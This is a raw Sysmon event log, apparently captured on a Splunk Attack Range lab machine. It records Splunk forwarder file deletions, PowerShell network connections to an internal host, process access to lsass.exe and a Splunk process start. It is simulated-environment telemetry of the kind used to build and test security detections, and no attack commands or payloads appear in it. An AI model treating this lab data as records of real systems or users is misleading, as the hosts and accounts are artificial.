13:21:11.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8164BD6454146371BD2EA8DDAB88498,SHA256=3265BD63AB622D477187DB37B37764A30019BDB1D95B6F08BC18459205BF1356,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:12.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC9D71500762E50A83A667FAEEE1FFBE,SHA256=442EAE2C24B8C1AEC0B3B9AE146C742B1A1E0596ECA692E90ACBD1E6728DA7BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:13.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D78F67EDB5791AD4F6C1115EFBED5AD,SHA256=86145BFED8196A390202B85022DC1765B3442486970AB213EBD83343F62E1AA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:43.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50627-false10.0.1.12-8000- 23542300x800000000000000036498247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:14.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15FB858343F4F3E4DF81CBF50B41875A,SHA256=0A37E76309A1CE44CF3D02A84481556220E574028A6C5DEAF10B5233A43E565E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:45.900{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50629-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:45.639{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50628-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:15.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1C11261F690A5895FD0D4B327BFF0619,SHA256=3F8F96E36835C9090AE78FB6D98CC42EE5FB75A5579C8FDF96CB148FB74890F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:15.160{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79EFBB188A67CB1C2B7A78E5597FDF8E,SHA256=5FEACCE9D5572D5E4B5A777BBE4A98AF6D0A0D3F4360E2D9F737B955E1CF3297,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:16.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40BD870CB33E447C220816A392B2BF3A,SHA256=A51057BE287BAF2CA7FC51FBDE518345CB7B0C474C2054EFF31EC6F20917A2D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:17.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8344D23CFAC4CFF066E2E6C3336C34AC,SHA256=1B190E1F513098269CF3747D046C6DD3C7AFB440DBEC82B34DD0DBD56C5C1CB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:48.439{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.15win-host-987.attackrange.local138netbios-dgm 354300x800000000000000036498256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:48.439{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x800000000000000036498255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:18.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A95142BA30B9099C18E133268E742563,SHA256=B0F96FA6FDC41E0ACAD1207C177D9A3613DE24B7AAD2750505FEF8B3C9C56C8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:19.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B186AFDDA2EB993E85CDB15C3487313A,SHA256=EED2C750080E4685256107C4DA835A1BD3207B6EA673168054CB121641291288,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.898{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-4012-611D-0A00-00000000C801}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036498262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.919{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50631-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:49.776{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50630-false10.0.1.12-8000- 23542300x800000000000000036498260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.266{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7C54568EAD813ED0C4859F99B4EB7CE8,SHA256=9E218524780FC9745953436750C3E0E128E1EF06D4BB8509DEE61F290E6649C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.250{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E87D0A64B9E7B45E44379243658EBB,SHA256=51A594F6E200173F13F0003B288E2A6D4856806C2114FC5BBFD1D57841DEC837,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:21.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EF586BB4F51DB2CCDB421305CA471803,SHA256=7C478AB786D3D5E359A92070379D200B6839CAB36A5AEEB9D49DB367EDC2776C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:21.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=041670692F2DAC5AF382F7992C30C1B0,SHA256=755D31486084E922B97892948FA345ADB32A0519D49C6D53BB4CC662149FB09C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:21.266{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A613B1575863540CEF8CF4B7DC705A,SHA256=AC850714EC63990B9DC57D8EB01771E7F4EC02902AB753040859383F288BE4C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:22.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87972DA407D7E6D9A94464D0A2BAB455,SHA256=569517255620794EF51D5BCC700284A443ECB6C1BE19FB1113E1374A16F64187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:52.606{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local50632-false72.21.81.240-80http 23542300x800000000000000036498271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:23.312{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C894E7E828880ABBC825FC7C9A321D,SHA256=8F533BC4503E90C25B47B41745091795A7484B8C65755BBC773FE85FDEE8D5F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:23.265{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C63D99929C6C02BA8DF374A4F191EA0B,SHA256=B78CEA7F100771B995C1C94616134AD57F0924DCCECBDB64B6811DCCDCF5982A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1D4-6140-A656-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A1D4-6140-A656-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.796{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1D4-6140-A656-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.781{B81B27B7-A1D4-6140-A656-04000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CD74C59A8416C33FBCAC113066BEB9D9,SHA256=DE40633E6AADB587396C79E86054EAE791BE5164970C82B245046CB826AE5C24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B3FAE96D3EF8DB922914E2B8F75A19,SHA256=2BA3C9ED36B7D708EBDDD8CEF6CF8A875868A6B64A8C8D54EAEE0DC188A4DAD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.264{B81B27B7-A1D4-6140-A556-04000000C801}54004852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 